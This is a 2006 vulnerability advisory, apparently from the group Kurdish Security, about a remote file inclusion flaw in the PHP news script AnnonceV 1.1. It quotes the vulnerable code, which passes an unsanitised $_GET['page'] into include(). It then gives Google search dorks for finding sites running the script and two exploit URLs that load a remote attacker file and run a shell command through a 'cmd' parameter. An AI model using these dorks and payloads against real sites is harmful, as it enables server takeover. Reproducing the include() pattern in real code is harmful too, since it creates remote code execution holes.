[Kurdish Security # 26 ] AnnonceV News Script Remote Command Vulnerability

2006-09-06T00:00:00
ID SECURITYVULNS:DOC:14159
Type securityvulns
Reporter Securityvulns
Modified 2006-09-06T00:00:00

Description

  • Kurdish Security Advisory
  • Original Adv : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-26-annoncev-news.html
  • Script : AnnonceV
  • Site : http://www.comscripts.com/scripts/php.annoncesv.1895.html
  • Version : 1.1
  • Risk : High
  • Class : Remote
  • Contact : botan@linuxmail.org and irc.gigachat.net #kurdhack
  • Nice crackerz sh00tz:milex,b3g0k,azad,fearless,darki,qawiste and other my friends

Google w0rkez :P : "AnnonceV1.1" : "/admin/annonce.php" : "/annonce.php"

lol now code :]

$page=$_GET['page'];

if(substr($page, -3) == 'txt')//pour les news { include("newsdisplay.php"); }

else //pour toutes les autres pages { include($page.".php"); }

?>

http://www.site.com/annonce.php?page=yourcode.txt?&cmd=id http://www.site.com/admin/annonce.php?page=yourcode.txt?&cmd=id